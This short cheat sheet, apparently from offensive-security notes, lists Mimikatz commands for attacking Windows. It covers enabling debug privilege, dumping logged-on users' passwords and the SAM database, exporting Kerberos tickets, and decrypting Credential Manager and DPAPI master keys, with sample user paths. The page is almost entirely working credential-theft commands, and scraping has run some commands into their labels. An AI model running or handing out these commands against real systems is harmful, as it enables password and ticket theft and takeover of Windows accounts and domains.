Mimikatz
A little tool to play with Windows security GitHub - gentilkiwi/mimikatz
Passwords & SAM
Launch mimikatz (as Administrator!)
mimikatz.exeEngage SeDebugPrivilege
privilege::debug-> OK
Whoami
token::whoamiDump creds of all logged-on users
sekurlsa::logonpasswords(Optional) Impersonate to nt authority\system
token::elevateDump sam database
lsadump::samTickets
Show tickets
sekurlsa::ticketsExport tickets
kerberos::list /exportCredential manager saved credentials
howto ~ credential manager saved credentials · gentilkiwi/mimikatz Wiki · GitHub
Locally?
vault::credFrom DC?
dpapi::cred /in:"C:\Users\Bethany\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"[...]
guidMasterKey : {fbd1319f-d18d-448f-92e2-287944ecf24c}
[...]dpapi::masterkey /in:"C:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\fbd1319f-d18d-448f-92e2-287944ecf24c"-> Look for "[domainkey]", decrypt using same command with /rpc
Last updated